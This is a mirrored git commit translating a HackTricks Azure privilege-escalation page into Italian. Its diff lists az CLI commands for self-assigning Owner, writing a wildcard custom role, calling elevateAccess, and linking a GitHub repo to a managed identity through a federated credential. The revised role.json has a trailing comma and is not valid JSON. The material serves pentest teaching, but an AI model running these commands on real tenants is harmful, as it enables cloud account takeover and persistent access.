gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-18 07:35:41 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-04-21 21:02:21 +00:00
parent e231886518
commit 58f0248b28
4 changed files with 72 additions and 46 deletions
Download Patch File Download Diff File Expand all files Collapse all files

60
src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure IAM
Fore more information check:
Per ulteriori informazioni controlla:
{{#ref}}
../az-services/az-azuread.md
@@ -12,45 +12,40 @@ Fore more information check:
### Microsoft.Authorization/roleAssignments/write
This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
Questo permesso consente di assegnare ruoli ai principi su un ambito specifico, consentendo a un attaccante di elevare i privilegi assegnando a se stesso un ruolo più privilegiato:
```bash
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
```
### Microsoft.Authorization/roleDefinitions/Write
This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
Create the file `role.json` with the following **content**:
Questo permesso consente di modificare i permessi concessi da un ruolo, permettendo a un attaccante di elevare i privilegi concedendo più permessi a un ruolo che ha assegnato.
Crea il file `role.json` con il seguente **contenuto**:
```json
{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
}
```
Then update the role permissions with the previous definition calling:
Quindi aggiorna i permessi del ruolo con la definizione precedente chiamando:
```bash
az role definition update --role-definition role.json
```
### Microsoft.Authorization/elevateAccess/action
This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
Questa autorizzazione consente di elevare i privilegi e di poter assegnare permessi a qualsiasi principale per le risorse Azure. È destinata a essere concessa agli Amministratori Globali di Entra ID in modo che possano gestire anche i permessi sulle risorse Azure.
> [!TIP]
> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
> Penso che l'utente debba essere Amministratore Globale in Entra ID affinché la chiamata di elevazione funzioni.
```bash
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -58,27 +53,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
```
### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
Example command to give access to a repo in Github to the a managed identity:
Questo permesso consente di aggiungere credenziali federate alle identità gestite. Ad esempio, consente di dare accesso a Github Actions in un repository a un'identità gestita. Quindi, consente di **accedere a qualsiasi identità gestita definita dall'utente**.
Esempio di comando per dare accesso a un repository in Github a un'identità gestita:
```bash
# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
```
{{#include ../../../banners/hacktricks-training.md}}